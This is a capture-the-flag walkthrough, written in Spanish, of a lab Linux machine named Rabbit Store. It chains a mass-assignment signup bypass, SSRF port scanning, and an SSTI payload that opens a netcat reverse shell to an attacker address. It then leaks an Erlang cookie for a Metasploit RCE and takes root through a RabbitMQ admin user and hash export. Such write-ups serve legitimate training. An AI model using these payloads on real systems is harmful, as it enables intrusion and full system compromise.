BlogTwitterLinkedIn

🐰Rabbit Store (Linux)

Demonstrate your web application testing skills and the basics of Linux to escalate your privileges.

Enumeración de Red

Nmap

Scan general y específico de servicios
sudo nmap -sS --min-rate 5000 -p- --open -n -Pn 10.10.53.118 -oN puertos
nmap -sCV -p22,80,4369,25672 -oN nmap

Resultado nmap

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3f:da:55:0b:b3:a9:3b:09:5f:b1:db:53:5e:0b:ef:e2 (ECDSA)
|_  256 b7:d3:2e:a7:08:91:66:6b:30:d2:0c:f7:90:cf:9a:f4 (ED25519)
80/tcp    open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to <http://cloudsite.thm/>
|_http-server-header: Apache/2.4.52 (Ubuntu)
4369/tcp  open  epmd    Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 25672
25672/tcp open  unknown
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • cloudsite.thm → /etc/hosts

Erlang Port Mapper Daemon (epmd) used by default on RabbitMQ and CouchDB installations.

Enumeración de Servicio Web - p80

http://cloudsite.thm

ffuf -u <http://cloudsite.thm/FUZZ> -w ~/Hunting/Wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -c

  • nothing

  • Login/Register → storage.cloudsite.thm

Análisis de Registration Workflow

  • Registro de test account → cloudsite.thm/dashboard/inactive

Mensaje en dashboard/inactive

Sorry, this service is only for internal users working within the organization and our clients. If you are one of our clients, please ask the administrator to activate your subscription.

Análisis de Sesión

La sesión contiene un JWT
Cookie: jwt=<jwt>

JWT Auth Bypass?

JWT Decode & Manipulation

Manipulación de valor de parámetro
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "email": "[email protected]",
  "subscription": "inactive",
  "iat": 1753981539,
  "exp": 1753985139
}

  • "subscription": "inactive" → "subscription": "active"

(Error: “Invalid Token”)

Explotación: Mass Assignment - API

PoC

Manipulación de registro con parámetro subscription
POST /api/register HTTP/1.1
Host: storage.cloudsite.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: application/json
Content-Length: 70
Origin: http://storage.cloudsite.thm
Priority: u=0

{
  "email":"[email protected]",
  "password":"test",
  "subscription": "active"
}

“User registered successfully”

  • Login Redirect → cloudsite.thm/dashboard/active

Acceso Nueva Función: File Upload

Análisis de File Upload

Funciones:

  • "Upload from Localhost"

  • "Upload from URL"

Upload from Localhost

Success: Image uploaded successfully!

File path: /api/uploads/<string>

  • Filtro de Nombre y de Extensión

Upload from URL

Levantar server para subir test file
python3 -m http.server

  • Success.

SSRF vulnerability?

Fuzzing API

Ffuf

ffuf -u <http://storage.cloudsite.thm/api/FUZZ> -w ~/Hunting/Wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -c

Resultado Ffuf

login                   [Status: 405, Size: 36, Words: 4, Lines: 1, Duration: 88ms]
register                [Status: 405, Size: 36, Words: 4, Lines: 1, Duration: 57ms]
docs                    [Status: 403, Size: 27, Words: 2, Lines: 1, Duration: 64ms]
uploads                 [Status: 401, Size: 32, Words: 3, Lines: 1, Duration: 56ms]

  • /docs - 403 Forbidden

Internal LFI?

Explotación: SSRF a LFI

Upload from URL

{
    "url":"http://127.0.0.1/api/docs/"
}

Contenido de Archivo Descargado: "Access denied"

Explotación: SSRF a Internal Port Scanning

Enumerar puertos con ffuf mediante SSRF
ffuf -u "<http://storage.cloudsite.thm/api/store-url>" \\ -X POST \\ -H "Content-Type: application/json" \\ -H "Cookie: jwt=<jwt>" \\ -d '{"url":"<http://127.0.0.1>:FUZZ"}' \\ -w <(seq 1 65535) \\ -mc all \\ -t 100 \\ -fs 41

  • Ports:

    • 80

    • 3000 → Express? (Tecnología usada en la web)

    • 8000

    • 15672

Explotación: SSRF a LFI II

Upload from URL

{
    "url":"http://127.0.0.1:3000/api/docs/"
}

Contenido /docs

Endpoints Perfectly Completed

POST Requests:
/api/register - For registering user
/api/login - For loggin in the user
/api/upload - For uploading files
/api/store-url - For uploadion files via url
/api/fetch_messeges_from_chatbot - Currently, the chatbot is under development. Once development is complete, it will be used in the future.

GET Requests: 
/api/uploads/filename - To view the uploaded files
/dashboard/inactive - Dashboard for inactive user
/dashboard/active - Dashboard for active user

Note: All requests to this endpoint are sent in JSON format.

Análisis de API Endpoint

  • GET /api/fetch_messeges_from_chatbot"GET method not allowed"

  • POST /api/fetch_messeges_from_chatbot500 ERROR

JSON dummy data
{
    "uwu":"uwu"
}
Excessive Data in Response
{
  "error": "username parameter is required"
}
Parámetro username
{
    "username":"admin"
}
Valor reflejado en respuesta
Sorry, admin, our chatbot server is currently under development.

SSTi Test

{
    "username":"{{7*7}}"
}
Respuesta
Sorry, 49, our chatbot server is currently under development.

SSTi Vulnerability

Ejemplo de Código Vulnerable

$output = $template->render("Hi " . $_GET['name']);

Explotando: SSTi a RCE

Establecer listener
nc -lvnp <port>
Reverse Shell SSTi Payload en parámetro username
{
    "username":"{{ config.__class__.__init__.__globals__['os'].system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip> <port> >/tmp/f') }}"
}

Intrusión en el Sistema

Shell: azrael

Enumeración Post-Intrusión

Servicio sospechoso

4369/tcp  open  epmd    Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 25672

Recurso

Logo4369 - Pentesting Erlang Port Mapper Daemon (epmd) - HackTricksbook.hacktricks.wiki

If you can leak the Authentication cookie you will be able to execute code on the host. Usually, this cookie is located in ~/.erlang.cookie and is generated by erlang at the first start.

Buscando la cookie
cat ~/.erlang.cookie
cat /.erlang.cookie
find / -type f -name erlang.cookie 2>/dev/null

  • No cookie

find / -name erlang 2>/dev/null

  • /usr/lib/erlang → No cookie

Recurso

LogoFreeKBwww.freekb.net

The global erlang cookie file is typically in /var/lib/rabbitmq/.erlang.cookie

  • Cookie leak!

Escalada de Privilegios: Erlang Cookie RCE

LogoErlang distribution RCE and a cookie bruteforcerInsinuator.net
Búsqueda de exploit en metasploit
msfconsole
metasploit > search erlang cookie

  • exploit/multi/misc/erlang_cookie_rce

Escalada de Privilegios

Shell: rabbitmq

Escalada de Privilegios II: RabbitMQ - Schema Definition Export

RabbitMQ Manual

LogoCommand Line Tools | RabbitMQwww.rabbitmq.com
Logorabbitmqctl.8 | RabbitMQ
Enumerar usuarios disponibles
rabbitmqctl list_users

error: cookie file must be accessible by owner only

Configurar permisos owner only
chmod 400 /var/lib/rabbitmq/.erlang.cookie
rabbitmqctl list_users

  • Administrator

The password for the root user is the SHA-256 hashed value of the RabbitMQ root user's password. Please don't attempt to crack SHA-256.

Creación de nuevo usuario administrador

Recurso

LogoHow do I create or add a user to rabbitmq?Stack Overflow
Crear usuario y configurar permisos
rabbitmqctl add_user uwu uwu
rabbitmqctl set_permissions -p / uwu ".*" ".*" ".*"
rabbitmqctl set_user_tags uwu administrator

Exportación de admin hash

LogoSchema Definition Export and Import | RabbitMQ
rabbitmqadmin export rabbit.definitions.json -u uwu -p uwu
cat rabbit definitions.json

RabbitMQ Password Cracking

Recurso

LogoPassword Cracking · Issue #27 · qkaiser/cottontailGitHub
Formatear el hash de RabbitMQ
echo <base64 rabbitmq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash

  • Root hash

su root
> <hash>

Compromiso del Sistema

Shell: Root

Última actualización